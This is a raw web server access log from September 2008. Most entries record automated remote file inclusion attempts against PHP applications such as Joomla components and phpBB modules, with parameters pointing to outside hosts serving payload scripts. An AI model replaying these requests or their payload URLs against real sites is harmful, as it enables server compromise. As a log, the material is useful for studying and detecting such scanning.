216.120.234.168 - - [12/Sep/2008:11:01:48 -0700] "GET /logs/access_080407.log//templates/mangobery/footer.sample.php?Site_Path=http://bboard.heroicpub.com/includes/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
216.120.234.168 - - [12/Sep/2008:11:01:48 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://bboard.heroicpub.com/includes/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
216.120.234.168 - - [12/Sep/2008:11:01:49 -0700] "GET /logs/access_080510.log//templates/mangobery/footer.sample.php?Site_Path=http://bboard.heroicpub.com/includes/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
87.226.77.5 - - [12/Sep/2008:11:01:58 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:11:02:06 -0700] "GET /logs/access_080816.log/index.php?errors=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:11:02:07 -0700] "GET /logs/access_080816.log/index.php?errors=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:11:02:07 -0700] "GET /index.php?errors=http://chebugis.net/id.txt??? HTTP/1.1" 200 89053 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:11:02:08 -0700] "GET /index.php?errors=http://chebugis.net/id.txt??? HTTP/1.1" 200 89053 "-" "libwww-perl/5.805" "www.dmulk.com"
80.237.130.22 - - [12/Sep/2008:11:02:09 -0700] "GET /logs/access_080407.log//templates/mangobery/footer.sample.php?Site_Path=http://bboard.heroicpub.com/includes/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
80.237.130.22 - - [12/Sep/2008:11:02:09 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://bboard.heroicpub.com/includes/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
80.237.130.22 - - [12/Sep/2008:11:02:09 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://bboard.heroicpub.com/includes/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
80.237.130.22 - - [12/Sep/2008:11:02:12 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://bboard.heroicpub.com/includes/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
80.237.130.22 - - [12/Sep/2008:11:02:12 -0700] "GET /logs/access_080407.log//templates/mangobery/footer.sample.php?Site_Path=http://bboard.heroicpub.com/includes/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
80.237.130.22 - - [12/Sep/2008:11:02:13 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://bboard.heroicpub.com/includes/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
80.237.130.22 - - [12/Sep/2008:11:02:13 -0700] "GET /logs/access_080510.log//templates/mangobery/footer.sample.php?Site_Path=http://bboard.heroicpub.com/includes/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:11:02:19 -0700] "GET /logs/index.php?errors=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.81.114 - - [12/Sep/2008:11:02:21 -0700] "GET /logs/access_080830.log//includes/header.php?c_temp_path=http://www.geocitie.com/dedi_plg2007/injek/bantai.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:11:02:22 -0700] "GET /logs/index.php?errors=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.49.120.85 - - [12/Sep/2008:11:02:47 -0700] "GET /logs/access_080820.log/index.php?id=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.49.120.85 - - [12/Sep/2008:11:02:49 -0700] "GET /index.php?id=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 200 89159 "-" "libwww-perl/5.79" "www.dmulk.com"
122.49.120.85 - - [12/Sep/2008:11:02:50 -0700] "GET /logs/index.php?id=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.64.130 - - [12/Sep/2008:11:02:56 -0700] "GET /logs/access_080308.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.82.114 - - [12/Sep/2008:11:02:56 -0700] "GET /logs/access_080308.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.64.130 - - [12/Sep/2008:11:02:56 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.64.130 - - [12/Sep/2008:11:02:57 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.82.114 - - [12/Sep/2008:11:02:57 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.82.114 - - [12/Sep/2008:11:02:58 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:11:02:59 -0700] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:11:03:00 -0700] "GET /skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:11:03:00 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.226.77.5 - - [12/Sep/2008:11:03:13 -0700] "GET /logs/access_080816.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.gkvbreda.nl/themes/media/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.214.82.114 - - [12/Sep/2008:11:03:29 -0700] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.82.114 - - [12/Sep/2008:11:03:29 -0700] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.82.114 - - [12/Sep/2008:11:03:29 -0700] "GET /skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.82.114 - - [12/Sep/2008:11:03:29 -0700] "GET /skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.82.114 - - [12/Sep/2008:11:03:30 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.82.114 - - [12/Sep/2008:11:03:30 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:03:34 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.214.64.130 - - [12/Sep/2008:11:03:39 -0700] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.64.130 - - [12/Sep/2008:11:03:39 -0700] "GET /skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.64.130 - - [12/Sep/2008:11:03:40 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.59.71.79 - - [12/Sep/2008:11:03:47 -0700] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://www.wandptraining.co.uk/includes/styles/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [12/Sep/2008:11:03:47 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.wandptraining.co.uk/includes/styles/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [12/Sep/2008:11:03:47 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.wandptraining.co.uk/includes/styles/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.214.64.130 - - [12/Sep/2008:11:03:51 -0700] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.64.130 - - [12/Sep/2008:11:03:52 -0700] "GET /skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.64.130 - - [12/Sep/2008:11:03:52 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.82.114 - - [12/Sep/2008:11:04:09 -0700] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.82.114 - - [12/Sep/2008:11:04:09 -0700] "GET /skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.82.114 - - [12/Sep/2008:11:04:10 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.48.60 - - [12/Sep/2008:11:04:13 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://cbmarketer.com/images/t_pane.jpg/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.15.48.60 - - [12/Sep/2008:11:04:14 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://cbmarketer.com/images/t_pane.jpg/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.120.234.168 - - [12/Sep/2008:11:04:14 -0700] "GET /logs/access_080511.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bboard.heroicpub.com/includes/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
67.15.48.60 - - [12/Sep/2008:11:04:14 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://cbmarketer.com/images/t_pane.jpg/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.120.234.168 - - [12/Sep/2008:11:04:14 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bboard.heroicpub.com/includes/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
216.120.234.168 - - [12/Sep/2008:11:04:14 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bboard.heroicpub.com/includes/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
67.15.48.60 - - [12/Sep/2008:11:04:15 -0700] "GET /logs/access_080430.log//newspublish/include.php?path%5Bdocroot%5D=http://cbmarketer.com/images/t_pane.jpg/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.120.234.168 - - [12/Sep/2008:11:04:15 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bboard.heroicpub.com/includes/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
216.120.234.168 - - [12/Sep/2008:11:04:19 -0700] "GET /logs/access_080511.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bboard.heroicpub.com/includes/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
216.120.234.168 - - [12/Sep/2008:11:04:19 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bboard.heroicpub.com/includes/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
216.120.234.168 - - [12/Sep/2008:11:04:19 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bboard.heroicpub.com/includes/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
216.120.234.168 - - [12/Sep/2008:11:04:20 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bboard.heroicpub.com/includes/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
74.6.22.178 - - [12/Sep/2008:11:04:38 -0700] "GET /logs/access_080221.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:05:04 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:05:05 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.85.102.132 - - [12/Sep/2008:11:05:14 -0700] "GET /logs//index.php?option=com_zoom&Itemid=&mosConfig_absolute_path=http://www.geocities.com/linasuci/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
70.85.102.132 - - [12/Sep/2008:11:05:15 -0700] "GET //index.php?option=com_zoom&Itemid=&mosConfig_absolute_path=http://www.geocities.com/linasuci/test.txt??? HTTP/1.1" 200 89404 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
86.148.195.184 - - [12/Sep/2008:11:05:34 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0139_0.jpg HTTP/1.1" 200 344118 "http://www.vfrdiscussion.com/forum/lofiversion/index.php/t36984.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "dmulk.com"
85.214.64.130 - - [12/Sep/2008:11:05:34 -0700] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.64.130 - - [12/Sep/2008:11:05:35 -0700] "GET /skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.64.130 - - [12/Sep/2008:11:05:35 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.247.222.53 - - [12/Sep/2008:11:05:36 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.dmulk.com"
61.247.222.53 - - [12/Sep/2008:11:05:37 -0700] "GET /presto/ HTTP/1.1" 200 526 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.dmulk.com"
74.6.22.178 - - [12/Sep/2008:11:05:38 -0700] "GET /bikes/dteel/2008_09_05/?N=A HTTP/1.0" 200 1678 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:05:40 -0700] "GET /logs/access_080419.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:05:40 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:05:41 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 200 3711 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:11:05:43 -0700] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:11:05:44 -0700] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:11:05:44 -0700] "GET /skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:11:05:44 -0700] "GET /skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:11:05:44 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:11:05:44 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:05:45 -0700] "GET /logs/access_080419.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:05:45 -0700] "GET /logs/access_080502.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:05:47 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:05:48 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 200 3711 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:11:05:49 -0700] "GET /logs/access_080308.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:11:05:49 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:11:05:50 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:05:53 -0700] "GET /logs/access_080502.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
216.55.155.50 - - [12/Sep/2008:11:06:03 -0700] "GET /logs/access_080717.log//home.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.55.155.50 - - [12/Sep/2008:11:06:03 -0700] "GET //home.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.55.155.50 - - [12/Sep/2008:11:06:03 -0700] "GET /logs//home.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.166.160.152 - - [12/Sep/2008:11:06:05 -0700] "GET /logs/access_080419.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.166.160.152 - - [12/Sep/2008:11:06:05 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.166.160.152 - - [12/Sep/2008:11:06:05 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 200 3711 "-" "libwww-perl/5.805" "www.dmulk.com"
203.166.160.152 - - [12/Sep/2008:11:06:07 -0700] "GET /logs/access_080504.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.41.187.99 - - [12/Sep/2008:11:06:08 -0700] "GET /logs/access_080717.log//home.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.187.99 - - [12/Sep/2008:11:06:08 -0700] "GET //home.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.187.99 - - [12/Sep/2008:11:06:08 -0700] "GET /logs//home.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.187.99 - - [12/Sep/2008:11:06:10 -0700] "GET /logs/access_080717.log//home.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.187.99 - - [12/Sep/2008:11:06:10 -0700] "GET //home.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
